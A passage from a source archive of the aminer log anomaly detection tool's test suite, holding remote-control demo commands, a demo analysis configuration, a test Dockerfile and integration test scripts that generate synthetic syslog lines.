sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)" #prints the 'Resources.MaxMemoryUsage'; changes the property 'Resources.MaxMemoryUsage' to -1, which means all the available memory can be used and prints it again. sudo aminerremotecontrol --data '["Resources.MaxMemoryUsage", -1]' --exec 'print_config_property(analysis_context, "%s" % remote_control_data[0])' --exec 'change_config_property(analysis_context, "%s" % remote_control_data[0], remote_control_data[1])' --exec 'print_config_property(analysis_context, "%s" % remote_control_data[0])' #add a new NewMatchPathDetector to the config. sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True), 'NewMatchPathDet')" sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True), 'NewMatchPathDet1')" #prints the current config to the console. #sudo aminerremotecontrol --exec "print_current_config(analysis_context)" --string-response #saves the current config to /tmp/config.py sudo aminerremotecontrol --exec "save_current_config(analysis_context,'/tmp/config.py')" #lists all the events from the VolatileLogarithmicBackoffEventHistory component, but the maximal count is 10. sudo aminerremotecontrol --exec "list_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',10)" --string-response #prints the event with the id 12 from the history. sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',12)" --string-response #prints the event with the id 13 from the history. 
sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',13)" --string-response #prints the event with the id 15 from the history. sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',15)" --string-response #ignores the events with the ids 12,13 and 15 from the history. sudo aminerremotecontrol --exec "ignore_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" --string-response #allowlists the events with the ids 21,22 and 23 from the history. sudo aminerremotecontrol --exec "allowlist_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[21,22,23])" --string-response # Currently following rules must be met to not create a allowlistViolation: # User root (logged in, logged out) or User 'username' (logged in, logged out) x minutes ago. # allowlist_rules = [Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # In the first step we print the current allowlist_rules. Maybe it is necessary to enlarge AnalysisChildRemoteControlHandler.maxControlPacketSize. #sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules')" --string-response # In the second step we add the user admin to not be tracked like the root user by adding another rule. 
sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'admin'))]),Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])" # In the third step we rename the user admin to the user administrator and leave all other rules. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'administrator'))]),Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])" # In the last step we remove all special rules and only allow User 'username' (logged in, logged out) x minutes ago. 
sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])" # Adds a new path to the known_path_set sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathDet',['/new/path1','/new/path2'])" --string-response # Persist all data. sudo aminerremotecontrol --exec "persist_all()" # List all backups. sudo aminerremotecontrol --exec "list_backups(analysis_context)" # Create a backup. sudo aminerremotecontrol --exec "create_backup(analysis_context)" # suspend the aminer. sudo aminerremotecontrol --exec "suspend" # activate the aminer. sudo aminerremotecontrol --exec "activate" # reopen all StreamPrinterEventHandler streams. sudo aminerremotecontrol --exec "reopen_event_handler_streams(analysis_context)"logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerRemoteControl/demo-config.py000066400000000000000000000502021437606560100304610ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import 
OptionalMatchModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However, if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. Note that whoever can connect to this socket can # execute code inside the aminer process (the remote-control demo uses # it to run arbitrary Python expressions), so its access rights must be # restricted to trusted administrators. config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analysis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relative to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts.
When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. 
""" # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPUWorkload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S')] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), 
FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('StartTime', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. 
atom_filters = AtomFilters.SubhandlerFilter(None) analysis_context.register_component(atom_filters, component_name="AtomFilter") from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filters]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) # skipcq: BAN-B108 from aminer.events.Utils import VolatileLogarithmicBackoffEventHistory volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(100) anomaly_event_handlers = [stream_printer_event_handler, volatile_logarithmic_backoff_event_history] analysis_context.register_component(volatile_logarithmic_backoff_event_history, component_name="VolatileLogarithmicBackoffEventHistory") # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. 
from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filters.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filters.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. 
allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filters.add_handler(allowlist_violation_detector) from aminer.analysis.ParserCount import ParserCount parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10) analysis_context.register_component(parser_count, component_name="ParserCount") atom_filters.add_handler(parser_count) from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True, hypothesis_max_delta_time=1.0, learn_mode=True) analysis_context.register_component(ecd, component_name="EventCorrelationDetector") atom_filters.add_handler(ecd) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filters.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector( analysis_context.aminer_config, ['/model/DailyCron/UName', '/model/DailyCron/JobNumber'], 
anomaly_event_handlers, learn_mode=False, tuple_transformation_function=tuple_transformation_function) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filters.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filters.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis(analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filters.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filters.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter( sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') 
analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filters.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=False) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filters.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector new_match_id_value_combo_detector = NewMatchIdValueComboDetector( analysis_context.aminer_config, ['/model/type/path/name', '/model/type/syscall/syscall'], anomaly_event_handlers, id_path_list=['/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True, allow_missing_values_flag=True, output_logline=True) analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector") atom_filters.add_handler(new_match_id_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/Job Number', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=False) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filters.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=False, default_interval=2, realert_interval=5) 
analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filters.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filters.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule('CronJobAnnouncement', 5, 6, artefact_match_parameters=[ ('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filters.add_handler(time_correlation_violation_detector) from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") 
anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.6.1/aecid-testsuite/docker/000077500000000000000000000000001437606560100222545ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/docker/Dockerfile_deb000066400000000000000000000035201437606560100250600ustar00rootroot00000000000000# Pull base image. ARG vardistri FROM $vardistri ARG varbranch ENV BRANCH=$varbranch # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary debian packages ARG DEBIAN_FRONTEND=noninteractive RUN apt-get update && apt-get install -y \ ansible \ git \ vim \ postfix \ procps \ cpulimit \ mailutils \ postfix \ rsyslog \ sudo \ curl \ apache2 \ locales \ locales-all RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \ dpkg-reconfigure --frontend=noninteractive locales && \ update-locale LANG=en_US.UTF-8 ENV LANG en_US.UTF-8 ENV LANGUAGE en_US:en ENV LC_ALL en_US.UTF-8 ADD scripts/distritest.sh /distritest.sh ADD . 
/opt/logdata-anomaly-miner RUN chmod 755 /distritest.sh RUN mkdir -p /opt/logdata-anomaly-miner/roles/aminer RUN echo varbranch $varbranch RUN cd /opt/logdata-anomaly-miner/roles && git clone -b $varbranch https://github.com/ait-aecid/aminer-ansible.git aminer RUN cd /opt/logdata-anomaly-miner && sed -e "s+{{SOURCEDIR}}+$PWD+g" /opt/logdata-anomaly-miner/.playbook.yml > /opt/logdata-anomaly-miner/playbook.yml RUN cd /opt/logdata-anomaly-miner && ansible-playbook playbook.yml RUN git clone -b $varbranch https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git /opt/wiki RUN awk '/^```yaml$/ && ++n == 1, /^```$/' < /opt/wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' | sed '/^```python/ d' > /home/aminer/gettingStarted-config.yml RUN ln -s /etc/aminer/conf-available/generic/ApacheAccessModel.py /etc/aminer/conf-enabled/ RUN echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer USER aminer WORKDIR /home/aminer ENTRYPOINT ["/distritest.sh"] logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/000077500000000000000000000000001437606560100233305ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/aminerIntegrationTest.sh000077500000000000000000000052101437606560100302040ustar00rootroot00000000000000#!/bin/bash #To add more log lines following positions must be changed: main script, checkAllOutputs, isExpectedOutput. The Position is marked with a "ADD HERE" comment. . ../testFunctions.sh . ./declarations.sh AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* LOGFILE=/tmp/syslog sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null echo "Integration test started.." echo "" CFG_PATH=/tmp/config.py if ! test -f "$CFG_PATH"; then echo "$CFG_PATH does not exist!" 
exit 1 fi time=`date +%s` #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $LOGFILE #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $LOGFILE #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $LOGFILE #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $LOGFILE #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> $LOGFILE #ADD HERE runAminerUntilEnd "sudo aminer --config $CFG_PATH" "$LOGFILE" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "/tmp/output" checkAllOutputs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then echo "" echo "all mails were found in the mailbox!" echo "finished test successfully.." else echo "" echo "test failed at checking mails.." 
exit 1 fi else echo "" echo "test failed at checking outputs.." exit 1 fi exit 0 logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/aminerIntegrationTest2.sh000077500000000000000000000147321437606560100302770ustar00rootroot00000000000000#!/bin/bash #To add more log lines following positions must be changed: main script, checkAllOutputs, isExpectedOutput. The Position is marked with a "ADD HERE" comment. . ./declarations.sh NUMBER_OF_LOG_LINES=7 OUT=/tmp/output SYSLOG=/tmp/syslog AUTH=/tmp/auth.log AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $SYSLOG 2> /dev/null sudo rm $AUTH 2> /dev/null sudo rm $OUT 2> /dev/null echo "Integration test started.." echo "" CFG_PATH21=/tmp/config21.py if ! test -f "$CFG_PATH21"; then echo "$CFG_PATH21 does not exist!" exit 1 fi CFG_PATH22=/tmp/config22.py if ! test -f "$CFG_PATH22"; then echo "$CFG_PATH22 does not exist!" exit 1 fi #< /dev/null & DOWNLOAD_PID=$! #start aminer sudo aminer --config $CFG_PATH21 > $OUT & PID=$! 
#Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $SYSLOG sleep 1 #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") > $AUTH sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $AUTH sleep 1 #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $AUTH sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $AUTH sleep 1 #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $SYSLOG sleep 1 #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> 